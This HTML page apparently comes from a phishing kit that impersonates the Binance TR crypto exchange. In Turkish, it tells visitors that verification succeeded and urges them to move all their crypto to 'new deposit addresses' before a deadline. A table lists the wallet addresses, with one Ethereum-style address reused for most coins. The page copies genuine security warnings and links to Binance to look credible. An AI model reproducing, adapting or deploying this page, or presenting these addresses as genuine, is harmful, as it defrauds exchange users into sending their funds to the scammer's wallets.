<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="robots" content="follow,index" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Binance TR</title>
        <meta name="description" content="Binance Global INC Crypto Trade Assets" />
        <meta name="keywords" content="login page css, login template, login css, login form template" />
        <link rel="apple-touch-icon" sizes="180x180" href="images/apple-touch-icon.png" />
        <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png" />
        <link rel="icon" type="image/png" sizes="16x16" href="images/favicon-16x16.png" />
        <link rel="manifest" href="https://mazipan.github.io/login-page-css/manifest.json" />
        <meta name="msapplication-TileColor" content="#fdcb04" />
        <meta name="theme-color" content="#fdcb04" />
        <link rel="manifest" href="https://mazipan.github.io/login-page-css/manifest.json" />
        <link rel="stylesheet" href="css/index.cdd05366.css" />
        <link rel="stylesheet" href="css/index.6a037238.css" />
        <link rel="stylesheet" href="css/index.fd599eac.css" />
        <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700&amp;display=swap" rel="stylesheet" />
        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-25065548-2"></script>

    </head>
    <body>
        <div class="app">
            <div class="login-page">
                <header class="header">
                    <div class="header__content">
                        <div class="header__logo logo">
                            <img src="images/logo.png" alt class="logo__img">
                        </div>
                        <ul class="header__nav nav">
                            <li class="nav__item"><a href="https://www.binance.com/tr" class="nav__link">Logout</a></li>
                        </ul>
                    </div>
                </header>

                        <div class="main__content-right">
                            <div class="form-login">
                            <center>
                                        <br>
										<br>
										<br>
										<br>
										<br>
								

<h3 style="text-align:center">Doğrulama Başarılı!</h3>

<p style="text-align:center"><span style="color:#e74c3c">G&uuml;venlik Uyarısı:</span></p>

<p style="text-align:center"><span style="font-size:13px">*Şifrenizi ve iki fakt&ouml;rl&uuml; doğrulama kodunuzu kimseye s&ouml;ylemeyin!<br />
*Kendisinin Binance TR adına &ccedil;alıştığını iddia eden herhangi bir m&uuml;şteri hizmetleri uzmanına para g&ouml;ndermeyin!<br />
*İki fakt&ouml;rl&uuml; doğrulamayı etkinleştirin (Google onayı veya SMS onayı)!</span></p>

<p style="text-align:center"><span style="font-size:13px">Aşağıdaki yeni kripto adreslerinizi l&uuml;tfen not ediniz.</span></p>

<p style="text-align:center"><span style="font-size:13px">26/07/2023 saat 23.59&#39;a (TSİ) kadar, kripto varlıklarınızı yeni adreslerinize g&ouml;nderiniz.</span></p>

<p style="text-align:center"><span style="font-size:13px">İşlem s&uuml;resi bittikten eski adresleriniz <span style="color:#e74c3c">erişilemeyecektir.&nbsp;</span></span></p>

<p style="text-align:center"><span style="font-size:12px">Eğer kripto para yatırma işlemini bilmiyorsanız <a href="https://www.binance.com/tr/support/faq/binance-te-nas%C4%B1l-kripto-para-yat%C4%B1r%C4%B1r%C4%B1m-%C3%A7ekerim-85a1c394ac1d489fb0bfac0ef2fceafd" target="_blank"><span style="color:#e67e22">buraya tıklayarak</span></a> &ouml;ğrenebilirsiniz.</span></p>

<p style="text-align:center"><span style="font-size:13px">G&ouml;nderimlerinizi istediğiniz ağ &uuml;zerinden yapabilirsiniz. &Ouml;r: BEP20, ERC20, TRC20...</span></p>

<p style="text-align:center"><span style="font-size:13px">Yatırdığınız ilk tutar, 1-7 saat i&ccedil;erisinde hesabınıza yansıyacaktır. <a href="https://www.binance.com/tr/support/announcement/belirli-a%C4%9Flardaki-mevcut-yat%C4%B1rma-adresleri-ve-memo-lar-kullan%C4%B1mdan-kald%C4%B1r%C4%B1lacak-c8d82e9c6c694be8b8d2cd88227ae1ea"><span style="color:#e67e22">Ayrıntılar</span></a></span></p>

<p style="text-align:center"><span style="font-size:13px"><span style="color:#e74c3c">Not:</span> G&ouml;nderim ağ &uuml;creti (network fee) 24 saat i&ccedil;erisinde hesabınıza aktarılacaktır.</span></p>

<h3 style="text-align:center"><span style="font-size:13px">Etkilenen Ağlardaki Yeni Yatırma Adresleriniz</span></h3>
<br>

<table align="center" border="1" cellpadding="1" cellspacing="1" style="width:25px">
	<tbody>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">BTC</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">bc1quy8cdduusdk9qsvn74hz4an9wfql98gy6m7waz</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">ETH</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">TRX</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">TNGhSWRZRvP6K8AdARTXX9mraxiBk4Bjvw</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">SOL</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">7HocTHNvFsw59YjBxU6Cusj17UnkMjfmRHqVhiBxxgj6</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">LTC</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">ltc1qkadkrqzsh8ta3q9ay0u6f05mwkcrhwnnxjd456</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">MATIC</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">WBTC</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">AVAX</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">DOGE</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">D8d55vbrxHiA5t8Jf8SAm5n3AW1xWysG3H</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">BNB</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">USDT</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">BUSD</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">DOT</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">XRP</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">SHIB</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">ADA</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">TWT</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
		<tr>
			<td style="text-align:center"><span style="font-size:11px"><span style="color:#e67e22">DİĞER</span></span></td>
			<td style="text-align:center"><span style="font-size:11px">0xd6497D4C617CfFBD4348F142774cCcb5108c7D2b</span></td>
		</tr>
	</tbody>
</table>

<p>&nbsp;</p>

<p style="text-align:center">&nbsp;</p>

<p style="text-align:center">Desteğiniz i&ccedil;in teşekk&uuml;rler!</p>

<p style="text-align:center">19/07/2023</p>

<p style="text-align:center">2017 - 2023 Binance.com. All rights reserved</p>

<p style="text-align:center">&nbsp;</p>

<p style="text-align:center">&nbsp;</p>

<p style="text-align:center">&nbsp;</p>



					
                                </div>
                            </div>
                        </div>

					
					</center>
                </main>
                
            </div>
        </div>
    </body>
</html>
